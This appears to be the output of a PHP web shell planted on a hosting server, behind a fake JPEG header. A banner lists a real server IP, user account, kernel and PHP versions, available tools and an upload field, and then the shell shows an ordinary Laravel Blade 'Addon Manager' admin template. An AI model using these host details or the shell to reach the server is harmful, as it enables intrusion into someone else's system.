����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.139.234.41 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/gle.gltechlimited.com/resources/views/admin/addonmanager/ |
Upload File : |
@extends('layouts.master') @section('title',__('Addon Manager')) @section('breadcum') <div class="breadcrumbbar"> <h4 class="page-title">{{ __('Addon Manager') }}</h4> <div class="breadcrumb-list"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="{{url('/admin')}}" title="{{ __('Dashboard') }}">{{ __('Dashboard') }}</a></li> <li class="breadcrumb-item active" aria-current="page">{{ __('Addon Manager') }}</li> </ol> </div> </div> @endsection @section('maincontent') <div class="contentbar"> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <button type="button" class="float-right btn btn-primary-rgba mr-2 " data-toggle="modal" data-target=".bd-example-modal-lg" title="{{ __('Install New Addon') }}"><i class="feather icon-plus mr-2"></i> {{ __('Install New Addon') }} </button> {{-- Install new Addon Model Start --}} <div class="modal fade bd-example-modal-lg" tabindex="-1" role="dialog" aria-hidden="true"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleLargeModalLabel">{{__("Install New Addon")}}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close" title="{{ __('Close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form action="{{ route('addon.install') }}" method="POST" enctype="multipart/form-data"> @csrf <div class="form-group"> <label>{{__('Enter Purchase Code')}}: <span class="text-danger">*</span></label> <input type="text" placeholder="{{__('Enter Purchase Code of Your Addon')}}" class="form-control" name="purchase_code"> </div> <div class="form-group"> <label>{{__('Choose Addon Zip File')}}: <span class="text-danger">*</span></label> <input type="file" class="form-control" name="addon_file"> </div> <div class="custom-control custom-checkbox"> <input type="checkbox" class="custom-control-input" id="customCheck1" name="eula"/> <label class="custom-control-label" for="customCheck1"><b>I agree <a href="" title="">Privacy Policy.</a></b></label> </div> <div class="form-group"> <button type="submit" class="btn btn-primary" title="{{__('Install')}}"><i class="feather icon-plus"></i> {{__('Install')}}</button> </div> </form> </div> </div> </div> </div> {{-- Install new Addon Model End --}} <h5 class="card-title">{{ __('Addon Manager') }}</h5> </div> <div class="card-body"> <div class="table-responsive"> <table id="modules" class="table table-bordered"> <thead> <th>#</th> <th>{{__('Logo')}}</th> <th>{{__('Addon Name')}}</th> <th>{{__('Status')}}</th> <th>{{__('Version')}}</th> <th>{{__('Actions')}}</th> </thead> <tbody> </tbody> </table> </div> </div> </div> </div> </div> </div> @endsection @section('script') <script src="{{ url('assets/js/admin/addon.js') }}"></script> @endsection